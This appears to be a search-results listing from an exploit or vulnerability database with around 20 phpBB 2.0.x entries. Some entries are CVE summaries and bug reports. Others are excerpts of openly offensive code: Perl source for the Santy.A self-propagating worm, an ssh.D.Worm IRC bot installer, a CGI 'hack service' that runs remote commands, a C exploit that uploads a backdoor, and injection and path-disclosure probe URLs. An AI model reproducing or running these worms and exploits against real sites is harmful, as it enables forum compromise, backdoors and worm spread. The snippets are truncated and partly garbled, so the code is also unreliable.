217 matches found
PHPBB 2.0.12 bug
PHPBB 2.0.12 is vulnerable again to a path disclosure bug. And again the bug is in viewtopic.php. I won't repeat my first submission so here is the bug: http://localhost/forum/viewtopic.php?t=4&highlight= As you can see you just need a valid topic. Here is another example:...
CVE-2005-0258
Directory traversal vulnerability in (1) usercp_register.php and (2) usercp_avatar.php for phpBB 2.0.11, and possibly other versions, with gallery avatars enabled, allows remote attackers to delete (unlink) arbitrary files via "/../" sequences in the avatarselect parameter...
phpBB < 2.0.12 Path Disclosure / Unauthorized unlink() Function Access
Binary data 2641.prm...
CVE-2004-1535
PHP remote file inclusion vulnerability in admin_cash.php for the Cash Mod module for phpBB allows remote attackers to execute arbitrary PHP code by modifying the phpbb_root_path parameter to reference a URL on a remote web server that contains the code...
Possible phpBB <=2.0.11 bug or sql injection?
Since phpbb's website says not to post it on their forum, I guess I'll post my findings here. http://www.phpbb.com/phpBB/search.php?searchauthor='fnfnfffffa,'cdf or http://www.phpbb.com/phpBB/search.php?searchauthor= It seems it has something to do with the 's 's and length. I am not sure if...
phpbb 2.0.11 bug
PHPBB 2.0.11 is vulnerable to a path disclosure. All you need is a valid topic and for highlight put . Here is a sample: http://www.site.com/forum/viewtopic.php?t=2&highlight= Here is the message you will get: Warning: Compilation failed: missing at offset 7 in c:appservwwwforumviewtopic.php1109 :...
phpBB 2.0.10 - 'ssh.D.Worm' Bot Install Altavista
!/usr/bin/perl ------------------------------------------------------------------------ Severino Honorato - /server irc.priv8crew.info Priv8crew - ssh.D.Worm use IO::Socket; use LWP::Simple; my $processo = "/usr/local/apache/bin/httpd -DSSL"; $SIG"INT" = "IGNORE"; $SIG"HUP" = "IGNORE"; $SIG"TERM"...
CVE-2004-1315
viewtopic.php in phpBB 2.x before 2.0.11 improperly URL decodes the highlight parameter when extracting words and phrases to highlight, which allows remote attackers to execute arbitrary PHP code by double-encoding the highlight value so that special characters are inserted into the result, which...
CVE-2004-1404
Attachment Mod 2.3.10 module for phpBB, when used with Apache mod_mime, does not properly handle files with multiple file extensions, such as .php.rar, which allows remote attackers to upload and execute arbitrary code...
CVE-2004-2054
CRLF injection vulnerability in PhpBB 2.0.4 and 2.0.9 allows remote attackers to perform HTTP Response Splitting attacks to modify expected HTML content from the server via (1) the mode parameter to privmsg.php or (2) the redirect parameter to login.php...
Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)
Exploit for unknown platform in category web applications ========================================================= Sanity.b - phpBB newPeerAddr="$site",PeerPort="80",Proto="tcp" or next; print $sock "GET /aolcom/search?q=$procura&Stage=0&page=$n HTTP/1.0\n\n"; @resu = ; close$sock; $ae = "@resu"...
phpBB highlight Arbitrary File Upload (Santy.A)
No description provided by source. Santy.A - phpBB = 2.0.10 Web Worm Source Code Proof of Concept -SECU For educational purpose See : http://isc.sans.org/diary.php?date=2004-12-21 http://www.f-secure.com/v-descs/santya.shtml !/usr/bin/perl use strict; use Socket; sub PayLoad; sub DoDir$; sub DoFi...
phpBB 2.0.10 - Santy.A Worm highlight Arbitrary File Upload
phpBB 2.0.10 - Santy.A Worm highlight Arbitrary File Upload Santy.A - phpBB 3; open IN, $0 or exit; my $self = join '', ; close IN; unlink $0; while!GrabURL'http://www.google.com/advancedsearch' if$generation 3 PayLoad ; else exit; $self = s/my $generation = \d+;/'my $generation = ' . $1 + 1...
phpBB < 2.0.10 - 'Santy.A Worm' 'highlight' Arbitrary File Upload
Santy.A - phpBB 3; open IN, $0 or exit; my $self = join '', ; close IN; unlink $0; while!GrabURL'http://www.google.com/advancedsearch' if$generation 3 PayLoad ; else exit; $self = s/my $generation = \d+;/'my $generation = ' . $1 + 1 . ';'/e; my $selfFileName = 'm1ho2of'; my $markStr =...
phpBB viewtopic.php fails to properly sanitize input passed to the "highlight" parameter
Overview phpBB contains a user input validation problem with regard to the parsing of the URL. An intruder can deface a phpBB website, execute arbitrary commands, or gain administrative privileges on a compromised bulletin board. Description phpBB is an open-source bulletin board. A lack of inpu...
phpbbquoteflaw.txt
Affected Software: phpBB 2.x tested on 2.0.4 and 2.0.8, untested on later versions Vulnerability: flaw in code handling the quoting of posts. Severity: Low Discovered by: Matt Benenati +Details+ ========= This flaw could allow a malicious user to alter the alignment and layout of any posts in the...
phpBB 1.0.0/2.0.10 - 'admin_cash.php' Remote Code Execution
/ exploit for phpBB 1.0.0 - 2.0.10 edit the b4b0.php file with the correct url to your backdoor and the correct filename for your backdoor upload it to a webserver. gcc -o b4b0-phpbb b4b0-phpbb.c ./b4b0-phpbb telnet greets to b4b0 -- evilrabbi / include include include include include include voi...
phpBB 2.0.10 - Remote Command Execution (CGI)
phpBB 2.0.10 - Remote Command Execution CGI !/usr/bin/perl wphpbb.cgi hack service: http://site/cgi-bin/wphpbb.cgi use CGI qw:standard; $CGI::HEADERSONCE = 1; $CGI = new CGI; $atak = $CGI-param"atak"; $serv = $CGI-param"serv"; $dir = $CGI-param"dir"; $topic = $CGI-param"topic"; $cmd =...
phpBB 2.0.10 - Remote Command Execution (CGI)
!/usr/bin/perl wphpbb.cgi hack service: http://site/cgi-bin/wphpbb.cgi use CGI qw:standard; $CGI::HEADERSONCE = 1; $CGI = new CGI; $atak = $CGI-param"atak"; $serv = $CGI-param"serv"; $dir = $CGI-param"dir"; $topic = $CGI-param"topic"; $cmd = $CGI-param"cmd"; print...
Phpbb id: 10701 update and Attachmodule add-on Directory Traversal
Phpbb: All vulnerable all except 2.0.11 Attachment module: All version vulnerable Howdark update opened wide my eyes with his nice exploit: Bugtraq id: 10701 ----- viewtopic.php?t=1&highlight=2527 ----- Looking at the code I saw that it was possible to inject any type of SQL query with a multiple char...